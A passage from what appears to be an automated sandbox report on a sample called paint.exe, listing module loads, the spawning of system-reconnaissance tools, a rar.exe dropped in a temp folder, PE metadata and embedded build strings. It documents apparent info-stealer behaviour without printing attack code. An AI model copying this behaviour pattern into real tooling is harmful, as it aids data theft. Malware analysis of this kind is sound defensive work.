              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: paint.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: paint.exeStatic file information: File size 8809834 > 1048576
              Source: paint.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: paint.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: paint.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: paint.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: paint.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: paint.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: paint.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: paint.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
              Source: Binary string: ucrtbase.pdb source: paint.exe, 00000001.00000002.2017036529.00007FFE01431000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: paint.exe, 00000001.00000002.2019605876.00007FFE13201000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: paint.exe, 00000001.00000002.2018668375.00007FFE126EB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: api-ms-win-core-file-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: paint.exe, 00000001.00000002.2020696017.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.pdbhP source: powershell.exe, 0000002F.00000002.1831220495.000001B38AF36000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: api-ms-win-core-localization-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: paint.exe, 00000001.00000002.2019344015.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: paint.exe, paint.exe, 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: paint.exe, paint.exe, 00000001.00000002.2017200622.00007FFE10231000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" 